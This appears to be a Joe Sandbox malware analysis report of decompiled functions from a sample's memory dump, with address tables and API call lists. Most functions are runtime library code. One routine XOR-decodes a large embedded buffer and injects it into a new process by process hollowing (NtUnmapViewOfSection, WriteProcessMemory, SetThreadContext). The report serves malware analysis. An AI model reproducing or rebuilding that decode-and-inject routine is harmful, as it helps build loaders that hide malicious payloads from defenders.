					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x454738; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x454745 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















    0x0040b3ac
    0x0040b3b6
    0x0040b3c0
    0x0040b3ca
    0x0040b3d1
    0x0040b3d3
    0x0040b3d3
    0x0040b3db
    0x0040b3e7
    0x0040b3f3
    0x0040b3f3
    0x0040b407
    0x0040b410
    0x0040b4bf
    0x0040b4c4
    0x0040b4c9
    0x0040b4d0
    0x0040b4d5
    0x0040b4d7
    0x0040b4da
    0x0040b4e0
    0x0040b4e2
    0x00000000
    0x0040b4ea
    0x0040b416
    0x0040b416
    0x0040b41d
    0x0040b41f
    0x0040b426
    0x00000000
    0x0040b426
    0x0040b433
    0x0040b443
    0x0040b445
    0x0040b44a
    0x0040b44d
    0x0040b453
    0x0040b455
    0x0040b457
    0x00000000
    0x0040b457
    0x0040b463
    0x0040b468
    0x0040b46e
    0x0040b46e
    0x0040b470
    0x0040b471
    0x0040b472
    0x0040b472
    0x0040b48e
    0x0040b494
    0x0040b499
    0x0040b49e
    0x0040b4a4
    0x0040b4a4
    0x0040b4a8
    0x0040b4ab
    0x0040b4b1
    0x0040b4b3
    0x00000000
    0x00000000
    0x0040b4b5
    0x0040b4b8
    0x0040b4b8
    0x0040b4b9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040b4b9
    0x0040b4a4
    0x0040b4f1
    0x0040b4f1
    0x00000000

    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 030083B7, Relevance: 6.1, APIs: 4, Instructions: 92
    C-Code - Quality: 79%
    			E030083B7(void* __ecx, intOrPtr __edx, intOrPtr* _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t27;
				intOrPtr _t33;
				int _t37;
				void* _t40;
				short* _t41;
				short* _t47;
				intOrPtr _t48;
				intOrPtr _t54;
				int _t56;
				intOrPtr _t57;
				intOrPtr _t60;
				signed int _t61;
				short* _t62;

				_t54 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t27 =  *0x300bbe4; // 0xbb40e64e
				_v8 = _t27 ^ _t61;
				_t47 = 0;
				_v12 = 0;
				if(_a24 == 0) {
					_a24 =  *((intOrPtr*)( *_a4 + 4));
				}
				_t56 = MultiByteToWideChar(_a24, 1 + (0 | _a28 != _t47) * 8, _a12, _a16, _t47, _t47);
				if(_t56 != _t47) {
					if(__eflags > 0) {
						__eflags = _t56 - 0x7ffffff0;
						if(_t56 <= 0x7ffffff0) {
							_t16 = _t56 + 8; // 0x8
							_t40 = _t56 + _t16;
							__eflags = _t40 - 0x400;
							if(_t40 > 0x400) {
								_t41 = E030089C5(_t54, _t56, MultiByteToWideChar, _t40);
								__eflags = _t41 - _t47;
								if(_t41 != _t47) {
									 *_t41 = 0xdddd;
									goto L11;
								}
							} else {
								E03009200(_t40);
								_t41 = _t62;
								__eflags = _t41 - _t47;
								if(_t41 != _t47) {
									 *_t41 = 0xcccc;
									L11:
									_t41 =  &(_t41[4]);
									__eflags = _t41;
								}
							}
							_t47 = _t41;
						}
					}
					__eflags = _t47;
					if(_t47 == 0) {
						goto L3;
					} else {
						E03006C50(_t47, 0, _t56 + _t56);
						_t37 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t47, _t56);
						__eflags = _t37;
						if(_t37 != 0) {
							_v12 = GetStringTypeW(_a8, _t47, _t37, _a20);
						}
						E0300816A(_t47);
						_t33 = _v12;
					}
				} else {
					L3:
					_t33 = 0;
				}
				_pop(_t57);
				_pop(_t60);
				_pop(_t48);
				return E03006BA0(_t33, _t48, _v8 ^ _t61, _t54, _t57, _t60);
			}






















    0x030083b7
    0x030083bc
    0x030083bd
    0x030083be
    0x030083c5
    0x030083c9
    0x030083cd
    0x030083d3
    0x030083dd
    0x030083dd
    0x03008403
    0x03008407
    0x0300840d
    0x0300840f
    0x03008415
    0x03008417
    0x03008417
    0x0300841b
    0x03008420
    0x03008436
    0x0300843c
    0x0300843e
    0x03008440
    0x00000000
    0x03008440
    0x03008422
    0x03008422
    0x03008427
    0x03008429
    0x0300842b
    0x0300842d
    0x03008446
    0x03008446
    0x03008446
    0x03008446
    0x0300842b
    0x03008449
    0x03008449
    0x03008415
    0x0300844b
    0x0300844d
    0x00000000
    0x0300844f
    0x03008456
    0x0300846b
    0x0300846d
    0x0300846f
    0x0300847f
    0x0300847f
    0x03008483
    0x03008488
    0x0300848b
    0x03008409
    0x03008409
    0x03008409
    0x03008409
    0x0300848f
    0x03008490
    0x03008491
    0x0300849d

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000100,?,?,?,?,?,030084CC,?,00000000,?), ref: 03008401
      • Part of subcall function 030089C5: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,030068FF,?,00000001,?,?,03006E19,00000018,03009958,0000000C,03006EA9), ref: 03008A0A
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0300846B
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 03008479
    • __freea.LIBCMT ref: 03008483
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 03004BD6, Relevance: 6.0, APIs: 4, Instructions: 50
    C-Code - Quality: 58%
    			E03004BD6() {
				signed int _t3;
				long _t4;
				struct _CRITICAL_SECTION* _t5;
				struct _CRITICAL_SECTION* _t14;
				signed int* _t17;
				struct _CRITICAL_SECTION** _t18;

				_t3 =  *0x300b1c0; // 0xffffffff
				if(_t3 != 0xffffffff) {
					__imp__DecodePointer( *0x300c648, _t3);
					 *_t3();
					 *0x300b1c0 =  *0x300b1c0 | 0xffffffff;
				}
				_t4 =  *0x300b1c4; // 0xffffffff
				if(_t4 != 0xffffffff) {
					TlsFree(_t4);
					 *0x300b1c4 =  *0x300b1c4 | 0xffffffff;
				}
				_t17 = 0x300bbf0;
				do {
					_t14 =  *_t17;
					if(_t14 != 0 && _t17[1] != 1) {
						DeleteCriticalSection(_t14);
						E03006891(_t14);
						 *_t17 =  *_t17 & 0x00000000;
					}
					_t17 =  &(_t17[2]);
				} while (_t17 < 0x300bd10);
				_t18 = 0x300bbf0;
				do {
					_t5 =  *_t18;
					if(_t5 != 0 && _t18[1] == 1) {
						DeleteCriticalSection(_t5);
					}
					_t18 =  &(_t18[2]);
				} while (_t18 < 0x300bd10);
				return _t5;
			}









    0x03004bd6
    0x03004bde
    0x03004be7
    0x03004bed
    0x03004bef
    0x03004bef
    0x03004bf6
    0x03004bfe
    0x03004c01
    0x03004c07
    0x03004c07
    0x03006d68
    0x03006d6e
    0x03006d6e
    0x03006d72
    0x03006d7b
    0x03006d7e
    0x03006d83
    0x03006d86
    0x03006d87
    0x03006d8a
    0x03006d92
    0x03006d98
    0x03006d98
    0x03006d9c
    0x03006da5
    0x03006da5
    0x03006da7
    0x03006daa
    0x03006db4

    APIs
    • DecodePointer.KERNEL32(FFFFFFFF,03004FFF,?,03002D9E), ref: 03004BE7
    • TlsFree.KERNEL32(FFFFFFFF,03004FFF,?,03002D9E), ref: 03004C01
    • DeleteCriticalSection.KERNEL32(00000000,00000000,00009E40,?,03004FFF,?,03002D9E), ref: 03006D7B
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
    • DeleteCriticalSection.KERNEL32(FFFFFFFF,00009E40,?,03004FFF,?,03002D9E), ref: 03006DA5
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 03006097, Relevance: 6.0, APIs: 4, Instructions: 47
    C-Code - Quality: 81%
    			E03006097(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x30098d8);
				E03005030(__ebx, __edi, __esi);
				_t31 = E03004D40(__ebx, __edx, _t35);
				_t15 =  *0x300b970; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E03006E8E(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x300b878; // 0x300b450
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x300b450;
								if(__eflags != 0) {
									E03006891(_t33);
								}
							}
						}
						_t21 =  *0x300b878; // 0x300b450
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x300b878; // 0x300b450
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E03006132();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E0300420B(_t29, _t38);
				}
				return E03005075(_t33);
			}









    0x03006097
    0x03006097
    0x03006097
    0x03006097
    0x03006099
    0x0300609e
    0x030060a8
    0x030060aa
    0x030060b2
    0x030060d3
    0x030060d9
    0x030060dd
    0x030060e0
    0x030060e3
    0x030060e9
    0x030060eb
    0x030060ed
    0x030060f6
    0x030060f8
    0x030060fa
    0x03006100
    0x03006103
    0x03006108
    0x03006100
    0x030060f8
    0x03006109
    0x0300610e
    0x03006111
    0x03006117
    0x0300611b
    0x0300611b
    0x03006121
    0x03006128
    0x030060ba
    0x030060ba
    0x030060ba
    0x030060bd
    0x030060bf
    0x030060c1
    0x030060c3
    0x030060c8
    0x030060d0

    APIs
    • __getptd.LIBCMT ref: 030060A3
      • Part of subcall function 03004D40: __amsg_exit.LIBCMT ref: 03004D50
    • __amsg_exit.LIBCMT ref: 030060C3
      • Part of subcall function 03006E8E: __amsg_exit.LIBCMT ref: 03006EB0
      • Part of subcall function 03006E8E: EnterCriticalSection.KERNEL32(?,?,?,03004C5D,0000000D), ref: 03006EB8
    • InterlockedDecrement.KERNEL32(?), ref: 030060F0
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
    • InterlockedIncrement.KERNEL32(0300B450), ref: 0300611B
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 03004CC7, Relevance: 6.0, APIs: 4, Instructions: 45
    C-Code - Quality: 58%
    			E03004CC7(void* __ebx) {
				void* __edi;
				void* __esi;
				long _t3;
				long* _t7;
				void* _t8;
				long _t11;
				long _t18;
				long* _t19;

				_t3 = GetLastError();
				_push( *0x300b1c0);
				_t18 = _t3;
				_t19 =  *((intOrPtr*)(E03004BA2()))();
				if(_t19 == 0) {
					_t7 = E03006933(1, 0x214);
					_t19 = _t7;
					if(_t19 != 0) {
						__imp__DecodePointer( *0x300c644,  *0x300b1c0, _t19);
						_t8 =  *_t7();
						_t22 = _t8;
						if(_t8 == 0) {
							E03006891(_t19);
							_t19 = 0;
							__eflags = 0;
						} else {
							_push(0);
							_push(_t19);
							E03004C13(__ebx, _t18, _t19, _t22);
							_t11 = GetCurrentThreadId();
							_t19[1] = _t19[1] | 0xffffffff;
							 *_t19 = _t11;
						}
					}
				}
				SetLastError(_t18);
				return _t19;
			}











    0x03004ccb
    0x03004cd1
    0x03004cd7
    0x03004ce0
    0x03004ce4
    0x03004ced
    0x03004cf2
    0x03004cf8
    0x03004d07
    0x03004d0d
    0x03004d0f
    0x03004d11
    0x03004d2c
    0x03004d32
    0x03004d32
    0x03004d13
    0x03004d13
    0x03004d15
    0x03004d16
    0x03004d1d
    0x03004d23
    0x03004d27
    0x03004d27
    0x03004d11
    0x03004cf8
    0x03004d35
    0x03004d3f

    APIs
    • GetLastError.KERNEL32(?,?,03003EAA,03002BF3), ref: 03004CCB
      • Part of subcall function 03004BA2: TlsGetValue.KERNEL32(?,03004CDE,?,03003EAA,03002BF3), ref: 03004BAB
      • Part of subcall function 03004BA2: DecodePointer.KERNEL32(?,03004CDE,?,03003EAA,03002BF3), ref: 03004BBD
      • Part of subcall function 03004BA2: TlsSetValue.KERNEL32(00000000,?,03004CDE,?,03003EAA,03002BF3), ref: 03004BCC
    • SetLastError.KERNEL32(00000000,?,03003EAA,03002BF3), ref: 03004D35
      • Part of subcall function 03006933: Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    • DecodePointer.KERNEL32(00000000,?,03003EAA,03002BF3), ref: 03004D07
    • GetCurrentThreadId.KERNEL32(?,03003EAA,03002BF3), ref: 03004D1D
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
      • Part of subcall function 03004C13: GetModuleHandleW.KERNEL32(KERNEL32.DLL,03009848,00000008,03004D1B,00000000,00000000,?,03003EAA,03002BF3), ref: 03004C24
      • Part of subcall function 03004C13: InterlockedIncrement.KERNEL32(0300B450), ref: 03004C65
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 0040152C, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E0040137C(0x4545e4, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









    0x00401530
    0x00401532
    0x00401534
    0x00401536
    0x0040154a
    0x0040154f
    0x00401551
    0x00401555
    0x0040155d
    0x00401563
    0x0040156f
    0x00401574
    0x00401574
    0x00401579
    0x00401582
    0x00401589
    0x00401595
    0x0040159c
    0x00000000
    0x0040159c
    0x00401589
    0x004015a2

    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00405E00, Relevance: 6.0, APIs: 4, Instructions: 11
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





    0x00405e03
    0x00405e0a
    0x00405e0f
    0x00405e15
    0x00405e1a

    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00408B80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x408c5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00403E88(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00403F20( &_v8, 0x408c80);
				} else {
					E00403F20( &_v8, 0x408c74);
				}
				_t32 = E00404348(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E004040F8(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E00408C65);
				return E00403E88( &_v8);
			}













    0x00408b8d
    0x00408b90
    0x00408b92
    0x00408b96
    0x00408b97
    0x00408b9c
    0x00408b9f
    0x00408ba4
    0x00408bb0
    0x00408bbb
    0x00408bc6
    0x00408bcd
    0x00408be6
    0x00408bcf
    0x00408bd7
    0x00408bd7
    0x00408bfa
    0x00408c13
    0x00408c22
    0x00408c28
    0x00408c43
    0x00408c43
    0x00408c28
    0x00408c4a
    0x00408c4d
    0x00408c50
    0x00408c5d

    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00418450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
    C-Code - Quality: 53%
    			E00418450() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t30;
				signed int _t33;
				void* _t37;
				void* _t38;
				intOrPtr _t42;
				void* _t47;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t42;
				GetSystemInfo( &_v40);
				_t33 = 0;
				_t30 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t33 == 0x20) {
						_t33 = 0;
					}
					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
					_t33 = _t33 + 1;
					_t15 = _t15 + 1;
					_t30 = _t30 - 1;
				} while (_t30 != 0);
				L4:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t37);
				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
				goto L4;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 03004C13, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40
    C-Code - Quality: 91%
    			E03004C13(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t39;
				void* _t40;

				_t31 = __ebx;
				_push(8);
				_push(0x3009848);
				E03005030(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x3001c10;
				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x300b450;
				E03006E8E(__ebx, 1, 0xd);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				InterlockedIncrement( *(_t39 + 0x68));
				 *(_t40 - 4) = 0xfffffffe;
				E03004CB5();
				E03006E8E(_t31, 1, 0xc);
				 *(_t40 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x300bbb8; // 0x300bae0
					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
				}
				E03006558( *((intOrPtr*)(_t39 + 0x6c)));
				 *(_t40 - 4) = 0xfffffffe;
				return E03005075(E03004CBE());
			}







    0x03004c13
    0x03004c13
    0x03004c15
    0x03004c1a
    0x03004c24
    0x03004c2a
    0x03004c2d
    0x03004c34
    0x03004c3b
    0x03004c3e
    0x03004c41
    0x03004c48
    0x03004c4f
    0x03004c58
    0x03004c5e
    0x03004c65
    0x03004c6b
    0x03004c72
    0x03004c79
    0x03004c7f
    0x03004c82
    0x03004c85
    0x03004c8a
    0x03004c8c
    0x03004c91
    0x03004c91
    0x03004c97
    0x03004c9d
    0x03004cae

    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,03009848,00000008,03004D1B,00000000,00000000,?,03003EAA,03002BF3), ref: 03004C24
      • Part of subcall function 03006E8E: __amsg_exit.LIBCMT ref: 03006EB0
      • Part of subcall function 03006E8E: EnterCriticalSection.KERNEL32(?,?,?,03004C5D,0000000D), ref: 03006EB8
    • InterlockedIncrement.KERNEL32(0300B450), ref: 03004C65
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 0300656A
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 03006577
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 03006584
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 03006591
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 0300659E
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 030065BA
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(00000000), ref: 030065CA
      • Part of subcall function 03006558: InterlockedIncrement.KERNEL32(?), ref: 030065E0
    Strings
    Memory Dump Source
